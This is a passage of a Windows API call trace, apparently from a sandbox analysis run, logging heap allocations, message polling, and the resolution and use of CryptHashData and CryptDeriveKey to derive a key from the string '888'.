(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0215.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0215.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0215.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0215.220] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0215.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0215.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0215.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0215.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0215.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0215.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0215.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0215.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0215.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0215.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0215.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0215.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0215.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0215.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54db8 [0215.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0215.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0215.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0215.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0215.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0215.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0215.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0215.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e88 [0215.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0215.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0215.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0215.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0215.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0215.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0215.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0215.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0215.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0215.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.222] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0215.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0215.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0215.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0215.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0215.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0215.252] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0215.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0215.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0215.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0215.252] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0215.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0215.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0215.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0215.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0215.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0215.253] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0215.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50a40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0215.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0215.253] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0215.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0215.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0215.254] CryptHashData (hHash=0xa87490, pbData=0x2e54d28, dwDataLen=0x3, dwFlags=0x1) returned 1 [0215.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0215.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.254] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0215.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b90 [0215.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0215.255] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0215.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0215.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0215.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0215.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0215.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0215.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0215.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0215.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0215.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0215.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0215.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0215.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0215.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0215.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0215.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0215.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0215.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0215.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0215.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0215.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0215.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0215.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0215.256] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0215.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0215.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bc0 [0215.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0215.256] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0215.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0215.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0215.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0215.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0215.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0215.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0215.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0215.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0215.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0215.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0215.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0215.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0215.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0215.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0215.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0215.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0215.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0215.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0215.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0215.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0215.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0215.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0215.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0215.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0215.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0215.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0215.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0215.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0215.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0215.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0215.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0215.258] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0215.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0215.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0215.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0215.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0215.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0215.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0215.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0215.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0215.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0215.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0215.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0215.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0215.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0215.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0215.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0215.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0215.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0215.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0215.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0215.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0215.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0215.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0215.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0215.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0215.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0215.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0215.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0215.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0215.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0215.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0215.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0215.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0215.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0215.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0215.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0215.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0215.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0215.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0215.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0215.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0215.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0215.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0215.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0215.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0215.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0215.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0215.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0215.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0215.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0215.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50c98 [0215.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50c98, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0215.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0215.261] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0215.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0215.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0215.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0215.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0215.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0215.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0215.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0215.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0215.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0215.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0215.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0215.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0215.262] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87490, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87510) returned 1 [0215.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0215.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0215.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) 